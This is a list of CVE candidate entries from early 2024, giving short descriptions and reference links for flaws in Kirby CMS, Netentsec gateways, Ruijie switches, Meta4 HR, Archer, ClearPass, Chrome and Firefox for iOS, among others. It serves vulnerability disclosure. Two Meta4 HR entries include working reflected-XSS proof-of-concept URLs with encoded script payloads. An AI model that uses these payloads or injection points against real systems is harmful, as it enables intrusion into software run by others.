CVE    2024    26483    Candidate    An arbitrary file upload vulnerability in the Profile Image module of Kirby CMS v4.1.0 allows attackers to execute arbitrary code via a crafted PDF file.    MISC:https://github.com/getkirby/kirby/security/advisories/GHSA-xrvh-rvc4-5m43   |   MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Unrestricted-File-Upload-dc60ce3132f04442b73f2dba2631fae0?pvs=4    Assigned (20240219)
CVE    2024    26482    Candidate    ** DISPUTED ** An HTML injection vulnerability exists in the Edit Content Layout module of Kirby CMS v4.1.0. NOTE: the vendor disputes the significance of this report because some HTML formatting (such as with an H1 element) is allowed, but there is backend sanitization such that the reporter's mentioned "injecting malicious scripts" would not occur.    MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-HTML-Injection-19ca19686d0a4533ab4b0c53fc977eef?pvs=4    Assigned (20240219)
CVE    2024    26481    Candidate    Kirby CMS v4.1.0 was discovered to contain a reflected self-XSS vulnerability via the URL parameter.    MISC:https://github.com/getkirby/kirby/security/advisories/GHSA-57f2-8p89-66x6   |   MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Self-Cross-Site-Scripting-d877183d20af49f8a8f58554bc06d51c?pvs=4    Assigned (20240219)
CVE    2024    2648    Candidate    A vulnerability, which was classified as problematic, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /nac/naccheck.php. The manipulation of the argument username leads to improper neutralization of data within xpath expressions. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257286 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257286 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257286   |   MISC:VDB-257286 | Netentsec NS-ASG Application Security Gateway naccheck.php xpath injection   |   URL:https://vuldb.com/?id.257286   |   MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-naccheck.md   |   URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-naccheck.md    Assigned (20240319)
CVE    2024    26476    Candidate    An issue in open-emr before v.7.0.2 allows a remote attacker to escalate privileges via a crafted script to the formid parameter in the ereq_form.php component.    MISC:https://github.com/c4v4r0n/Research/blob/main/openemr_BlindSSRF/README.md   |   MISC:https://github.com/mpdf/mpdf/issues/867    Assigned (20240219)
CVE    2024    26475    Candidate    An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.    MISC:https://github.com/TronciuVlad/CVE-2024-26475    Assigned (20240219)
CVE    2024    26473    Candidate    A reflected cross-site scripting (XSS) vulnerability in SocialMediaWebsite v1.0.1 allows attackers to inject malicious JavaScript into the web browser of a victim via the poll parameter in poll.php.    MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26473   |   MISC:https://github.com/msaad1999/KLiK-SocialMediaWebsite/    Assigned (20240219)
CVE    2024    26472    Candidate    KLiK SocialMediaWebsite version 1.0.1 from msaad1999 has a reflected cross-site scripting (XSS) vulnerability which may allow remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'selector' or 'validator' parameters of 'create-new-pwd.php'.    MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26472   |   MISC:https://github.com/msaad1999/KLiK-SocialMediaWebsite/    Assigned (20240219)
CVE    2024    26471    Candidate    A reflected cross-site scripting (XSS) vulnerability in zhimengzhe iBarn v1.5 allows attackers to inject malicious JavaScript into the web browser of a victim via the search parameter in offer.php.    MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26471   |   MISC:https://github.com/zhimengzhe/iBarn    Assigned (20240219)
CVE    2024    26470    Candidate    A host header injection vulnerability in the forgot password function of FullStackHero's WebAPI Boilerplate v1.0.0 and v1.0.1 allows attackers to leak the password reset token via a crafted request.    MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26470   |   MISC:https://github.com/fullstackhero/dotnet-webapi-boilerplate   |   MISC:https://www.nuget.org/packages/FullStackHero.WebAPI.Boilerplate    Assigned (20240219)
CVE    2024    2647    Candidate    A vulnerability, which was classified as critical, has been found in Netentsec NS-ASG Application Security Gateway 6.3. This issue affects some unknown processing of the file /admin/singlelogin.php. The manipulation of the argument loginId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257285 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257285 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257285   |   MISC:VDB-257285 | Netentsec NS-ASG Application Security Gateway singlelogin.php sql injection   |   URL:https://vuldb.com/?id.257285   |   MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-singlelogin.md   |   URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-singlelogin.md    Assigned (20240319)
CVE    2024    26469    Candidate    Server-Side Request Forgery (SSRF) vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows remote attackers to cause a denial of service (DoS) and escalate privileges via the url parameter in the postProcess() method.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-productdesigner-918.md    Assigned (20240219)
CVE    2024    26468    Candidate    A DOM based cross-site scripting (XSS) vulnerability in the component index.html of jstrieb/urlpages before commit 035b647 allows attackers to execute arbitrary Javascript via sending a crafted URL.    MISC:https://gist.github.com/cd80/87b41cf58ba04564d55f4a26152bf0a9    Assigned (20240219)
CVE    2024    26467    Candidate    A DOM based cross-site scripting (XSS) vulnerability in the component generator.html of tabatkins/railroad-diagrams before commit ea9a123 allows attackers to execute arbitrary Javascript via sending a crafted URL.    MISC:https://gist.github.com/cd80/50463b0e62067ec861b7006cbf46b068    Assigned (20240219)
CVE    2024    26466    Candidate    A DOM based cross-site scripting (XSS) vulnerability in the component /dom/ranges/Range-test-iframe.html of web-platform-tests/wpt before commit 938e843 allows attackers to execute arbitrary Javascript via sending a crafted URL.    MISC:https://gist.github.com/cd80/8e41a17bc0c2113f6347581cec726d11    Assigned (20240219)
CVE    2024    26465    Candidate    A DOM based cross-site scripting (XSS) vulnerability in the component /beep/Beep.Instrument.js of stewdio beep.js before commit ef22ad7 allows attackers to execute arbitrary Javascript via sending a crafted URL.    MISC:https://gist.github.com/cd80/89527424f733b2b82de876e02d163150    Assigned (20240219)
CVE    2024    26462    Candidate    Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/kdc/ndr.c.    MISC:https://github.com/LuMingYinDetect/krb5_defects/blob/main/krb5_detect_3.md    Assigned (20240219)
CVE    2024    26461    Candidate    Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/lib/gssapi/krb5/k5sealv3.c.    MISC:https://github.com/LuMingYinDetect/krb5_defects/blob/main/krb5_detect_2.md    Assigned (20240219)
CVE    2024    2646    Candidate    A vulnerability classified as critical was found in Netentsec NS-ASG Application Security Gateway 6.3. This vulnerability affects unknown code of the file /vpnweb/index.php?para=index. The manipulation of the argument check_VirtualSiteId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257284. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257284 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257284   |   MISC:VDB-257284 | Netentsec NS-ASG Application Security Gateway sql injection   |   URL:https://vuldb.com/?id.257284   |   MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-index.md   |   URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-index.md    Assigned (20240319)
CVE    2024    26458    Candidate    Kerberos 5 (aka krb5) 1.21.2 contains a memory leak in /krb5/src/lib/rpc/pmap_rmt.c.    MISC:https://github.com/LuMingYinDetect/krb5_defects/blob/main/krb5_detect_1.md    Assigned (20240219)
CVE    2024    26455    Candidate    fluent-bit 2.2.2 contains a Use-After-Free vulnerability in /fluent-bit/plugins/custom_calyptia/calyptia.c.    MISC:https://github.com/LuMingYinDetect/fluent-bit_defects/blob/main/fluent-bit_detect_1.md    Assigned (20240219)
CVE    2024    26454    Candidate    A Cross Site Scripting vulnerability in Healthcare-Chatbot through 9b7058a can occur via a crafted payload to the email1 or pwd1 parameter in login.php.    MISC:https://github.com/OmRajpurkar/Healthcare-Chatbot/issues/4   |   MISC:https://medium.com/@0x0d0x0a/healthcare-chatbot-xss-cve-2024-26454-acf2607bf210    Assigned (20240219)
CVE    2024    26450    Candidate    An issue exists within Piwigo before v.14.2.0 allowing a malicious user to take over the application. This exploit involves chaining a Cross Site Request Forgery vulnerability to issue a Stored Cross Site Scripting payload stored within an Admin user's dashboard, executing remote JavaScript. This can be used to upload a new PHP file under an administrator and directly call that file from the victim's instance to connect back to a malicious listener.    MISC:https://github.com/Piwigo/Piwigo/security/advisories/GHSA-p362-cfpj-q55f    Assigned (20240219)
CVE    2024    2645    Candidate    A vulnerability classified as problematic has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /vpnweb/resetpwd/resetpwd.php. The manipulation of the argument UserId leads to improper neutralization of data within xpath expressions. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257283. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257283 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257283   |   MISC:VDB-257283 | Netentsec NS-ASG Application Security Gateway resetpwd.php xpath injection   |   URL:https://vuldb.com/?id.257283   |   MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-laddfirewall.md   |   URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-laddfirewall.md    Assigned (20240319)
CVE    2024    26445    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_place.php    MISC:https://github.com/xiaolanjing0/cms/blob/main/1.md    Assigned (20240219)
CVE    2024    2644    Candidate    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /protocol/firewall/addfirewall.php. The manipulation of the argument FireWallTableArray leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257282 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257282 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257282   |   MISC:VDB-257282 | Netentsec NS-ASG Application Security Gateway addfirewall.php sql injection   |   URL:https://vuldb.com/?id.257282   |   MISC:https://github.com/hundanchen69/cve/blob/main/NS-ASG-sql-laddfirewall.md   |   URL:https://github.com/hundanchen69/cve/blob/main/NS-ASG-sql-laddfirewall.md    Assigned (20240319)
CVE    2024    2642    Candidate    A vulnerability was found in Ruijie RG-NBS2009G-P up to 20240305. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /EXCU_SHELL. The manipulation of the argument Command1 leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257281 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257281   |   MISC:VDB-257281 | Ruijie RG-NBS2009G-P EXCU_SHELL command injection   |   URL:https://vuldb.com/?id.257281   |   MISC:https://h0e4a0r1t.github.io/2024/vulns/Ruijie%20RG-NBS2009G-P%20switch%20has%20a%20foreground%20CLI%20command%20injection%20vulnerability.pdf   |   URL:https://h0e4a0r1t.github.io/2024/vulns/Ruijie%20RG-NBS2009G-P%20switch%20has%20a%20foreground%20CLI%20command%20injection%20vulnerability.pdf    Assigned (20240319)
CVE    2024    2641    Candidate    A vulnerability was found in Ruijie RG-NBS2009G-P up to 20240305. It has been classified as critical. Affected is an unknown function of the file /system/passwdManage.htm of the component Password Handler. The manipulation leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257280 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257280   |   MISC:VDB-257280 | Ruijie RG-NBS2009G-P Password passwdManage.htm improper authorization   |   URL:https://vuldb.com/?id.257280   |   MISC:https://h0e4a0r1t.github.io/2024/vulns/Unauthorized%20access%20vulnerability%20in%20Ruijie%20RG-NBS2009G-P%20switch.pdf   |   URL:https://h0e4a0r1t.github.io/2024/vulns/Unauthorized%20access%20vulnerability%20in%20Ruijie%20RG-NBS2009G-P%20switch.pdf    Assigned (20240319)
CVE    2024    2639    Candidate    A vulnerability was found in Bdtask Wholesale Inventory Management System up to 20240311. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to session fixation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257245 | Bdtask Wholesale Inventory Management System session fixiation   |   URL:https://vuldb.com/?id.257245   |   MISC:VDB-257245 | CTI Indicators (IOB, IOC)   |   URL:https://vuldb.com/?ctiid.257245   |   MISC:https://drive.google.com/file/d/1bNnSNssAeQFkO0FdW_yaEvDg5XExMPaf/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/1bNnSNssAeQFkO0FdW_yaEvDg5XExMPaf/view?usp=drivesdk    Assigned (20240319)
CVE    2024    26369    Candidate    An issue in the HistoryQosPolicy component of FastDDS v2.12.x, v2.11.x, v2.10.x, and v2.6.x leads to a SIGABRT (signal abort) upon receiving DataWriter's data.    MISC:https://github.com/eProsima/Fast-DDS/issues/4365   |   MISC:https://github.com/eProsima/Fast-DDS/pull/4375    Assigned (20240219)
CVE    2024    2636    Candidate    An Unrestricted Upload of File vulnerability has been found on Cegid Meta4 HR that allows an attacker to upload malicious files to the server via the '/config/espanol/update_password.jsp' file. By modifying the 'M4_NEW_PASSWORD' parameter, an attacker could store a malicious JSP file inside the file directory, to be executed when the file is loaded in the application.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid    Assigned (20240319)
CVE    2024    26352    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/add_places.php    MISC:https://github.com/Icycu123/cms/blob/main/3.md    Assigned (20240219)
CVE    2024    26351    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_place.php    MISC:https://github.com/Icycu123/cms/blob/main/4.md    Assigned (20240219)
CVE    2024    26350    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_contact_form_settings.php    MISC:https://github.com/Icycu123/cms/blob/main/2.md    Assigned (20240219)
CVE    2024    2635    Candidate    The configuration pages available are not intended to be placed on an Internet facing web server, as they expose file paths to the client, who can be an attacker. Instead of rewriting these pages to avoid this vulnerability, they will be dismissed from future releases of Cegid Meta4 HR, as they do not offer product functionality    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid    Assigned (20240319)
CVE    2024    26349    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_translation.php    MISC:https://github.com/Icycu123/cms/blob/main/1.md    Assigned (20240219)
CVE    2024    26342    Candidate    A Null pointer dereference in usr/sbin/httpd in ASUS AC68U 3.0.0.4.384.82230 allows remote attackers to trigger DoS via network packet.    MISC:https://github.com/Nicholas-wei/bug-discovery/blob/main/asus/2/ASUS_ac68u.md    Assigned (20240219)
CVE    2024    2634    Candidate    A Cross-Site Scripting Vulnerability has been found on Meta4 HR affecting version 819.001.022 and earlier. The endpoint '/sse_generico/generico_login.jsp' is vulnerable to XSS attack via 'lang' query, i.e. '/sse_generico/generico_login.jsp?lang=%27%3balert(%27BLEUSS%27)%2f%2f&params='.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid    Assigned (20240319)
CVE    2024    26339    Candidate    swftools v0.9.2 was discovered to contain a strcpy parameter overlap via /home/swftools/src/swfc+0x48318a.    MISC:https://github.com/matthiaskramm/swftools/issues/225    Assigned (20240219)
CVE    2024    26337    Candidate    swftools v0.9.2 was discovered to contain a segmentation violation via the function s_font at swftools/src/swfc.c.    MISC:https://github.com/matthiaskramm/swftools/issues/223    Assigned (20240219)
CVE    2024    26335    Candidate    swftools v0.9.2 was discovered to contain a segmentation violation via the function state_free at swftools/src/swfc-history.c.    MISC:https://github.com/matthiaskramm/swftools/issues/222    Assigned (20240219)
CVE    2024    26334    Candidate    swftools v0.9.2 was discovered to contain a segmentation violation via the function compileSWFActionCode at swftools/lib/action/actioncompiler.c.    MISC:https://github.com/matthiaskramm/swftools/issues/221    Assigned (20240219)
CVE    2024    26333    Candidate    swftools v0.9.2 was discovered to contain a segmentation violation via the function free_lines at swftools/lib/modules/swfshape.c.    MISC:https://github.com/matthiaskramm/swftools/issues/219    Assigned (20240219)
CVE    2024    2633    Candidate    A Cross-Site Scripting Vulnerability has been found on Meta4 HR affecting version 819.001.022 and earlier. The endpoint '/sitetest/english/dumpenv.jsp' is vulnerable to XSS attack by 'lang' query, i.e. '/sitetest/english/dumpenv.jsp?snoop=yes&lang=%27%3Cimg%20src/onerror=alert(1)%3E&params'.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid    Assigned (20240319)
CVE    2024    26328    Candidate    An issue was discovered in QEMU 7.1.0 through 8.2.1. register_vfs in hw/pci/pcie_sriov.c does not set NumVFs to PCI_SRIOV_TOTAL_VF, and thus interaction with hw/nvme/ctrl.c is mishandled.    MISC:https://lore.kernel.org/all/20240213055345-mutt-send-email-mst@kernel.org/    Assigned (20240219)
CVE    2024    26327    Candidate    An issue was discovered in QEMU 7.1.0 through 8.2.1. register_vfs in hw/pci/pcie_sriov.c mishandles the situation where a guest writes NumVFs greater than TotalVFs, leading to a buffer overflow in VF implementations.    MISC:https://lore.kernel.org/all/20240214-reuse-v4-5-89ad093a07f4@daynix.com/    Assigned (20240219)
CVE    2024    2632    Candidate    An Information Exposure Vulnerability has been found on Meta4 HR. This vulnerability allows an attacker to obtain a lot of information about the application, such as the variables set in the process, the Tomcat versions, library versions and underlying operating system, via HTTP GET '/sitetest/english/dumpenv.jsp'.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid    Assigned (20240319)
CVE    2024    26318    Candidate    Serenity before 6.8.0 allows XSS via an email link because LoginPage.tsx permits return URLs that do not begin with a / character.    MISC:https://serenity.is/docs/release-notes/6.8.0    Assigned (20240219)
CVE    2024    26313    Candidate    Archer Platform 6.x before 6.14 P2 HF2 (6.14.0.2.2) contains a stored cross-site scripting (XSS) vulnerability. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.13.P3 HF1 (6.13.0.3.1) is also a fixed release.    MISC:https://archerirm.com   |   MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/717102    Assigned (20240219)
CVE    2024    26311    Candidate    Archer Platform 6.x before 6.14 P2 HF1 (6.14.0.2.1) contains a reflected XSS vulnerability. A remote authenticated malicious Archer user could potentially exploit this by tricking a victim application user into supplying malicious JavaScript code to the vulnerable web application. This code is then reflected to the victim and gets executed by the web browser in the context of the vulnerable web application.    MISC:https://archerirm.com   |   MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/716134    Assigned (20240219)
CVE    2024    26310    Candidate    Archer Platform 6.8 before 6.14 P2 (6.14.0.2) contains an improper access control vulnerability. A remote authenticated malicious user could potentially exploit this to gain access to API information that should only be accessible with extra privileges.    MISC:https://archerirm.com   |   MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/716134    Assigned (20240219)
CVE    2024    2631    Candidate    Inappropriate implementation in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/41495878   |   URL:https://issues.chromium.org/issues/41495878    Assigned (20240319)
CVE    2024    26309    Candidate    Archer Platform 6.x before 6.14 P2 HF2 (6.14.0.2.2) contains a sensitive information disclosure vulnerability. An unauthenticated attacker could potentially obtain access to sensitive information via an internal URL.    MISC:https://archerirm.com   |   MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/717102    Assigned (20240219)
CVE    2024    26308    Candidate    Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26. Users are recommended to upgrade to version 1.26, which fixes the issue.    CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0009/   |   MISC:https://lists.apache.org/thread/ch5yo2d21p7vlqrhll9b17otbyq4npfg   |   URL:https://lists.apache.org/thread/ch5yo2d21p7vlqrhll9b17otbyq4npfg   |   MLIST:[oss-security] 20240219 CVE-2024-26308: Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file   |   URL:http://www.openwall.com/lists/oss-security/2024/02/19/2    Assigned (20240217)
CVE    2024    26307    Candidate    Possible race condition vulnerability in Apache Doris. Some of the code uses the `chmod()` method. This method runs the risk of someone renaming the file out from under the user and chmodding the wrong file. This could theoretically happen, but the impact would be minimal. This issue affects Apache Doris: before 1.2.8, before 2.0.4. Users are recommended to upgrade to version 2.0.4, which fixes the issue.    MISC:https://lists.apache.org/thread/5shhw8x8m271hd2wfwzqzwgf36pmc4pl   |   URL:https://lists.apache.org/thread/5shhw8x8m271hd2wfwzqzwgf36pmc4pl    Assigned (20240217)
CVE    2024    26302    Candidate    A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt    Assigned (20240216)
CVE    2024    26300    Candidate    A vulnerability in the guest interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt    Assigned (20240216)
CVE    2024    2630    Candidate    Inappropriate implementation in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/41481877   |   URL:https://issues.chromium.org/issues/41481877    Assigned (20240319)
CVE    2024    26299    Candidate    A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt    Assigned (20240216)
CVE    2024    26298    Candidate    Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt    Assigned (20240216)
CVE    2024    2629    Candidate    Incorrect security UI in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/41487721   |   URL:https://issues.chromium.org/issues/41487721    Assigned (20240319)
CVE    2024    26288    Candidate    An unauthenticated remote attacker can influence the communication due to the lack of encryption of sensitive data via a MITM. Charging is not affected.    MISC:https://cert.vde.com/en/advisories/VDE-2024-011   |   URL:https://cert.vde.com/en/advisories/VDE-2024-011    Assigned (20240216)
CVE    2024    26284    Candidate    Utilizing a 302 redirect, an attacker could have conducted a Universal Cross-Site Scripting (UXSS) on a victim website, if the victim had a link to the attacker's website. This vulnerability affects Focus for iOS < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1860075   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1860075   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-10/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-10/    Assigned (20240215)
CVE    2024    26283    Candidate    An attacker could have executed unauthorized scripts on top origin sites using a JavaScript URI when opening an external URL with a custom Firefox scheme. This vulnerability affects Firefox for iOS < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1850158   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1850158   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-08/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-08/    Assigned (20240215)
CVE    2024    26282    Candidate    Using an AMP url with a canonical element, an attacker could have executed JavaScript from an opened bookmarked page. This vulnerability affects Firefox for iOS < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1863788   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1863788   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-08/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-08/    Assigned (20240215)
CVE    2024    26281    Candidate    Upon scanning a JavaScript URI with the QR code scanner, an attacker could have executed unauthorized scripts on the current top origin sites in the URL bar. This vulnerability affects Firefox for iOS < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1868005   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1868005   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-08/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-08/    Assigned (20240215)
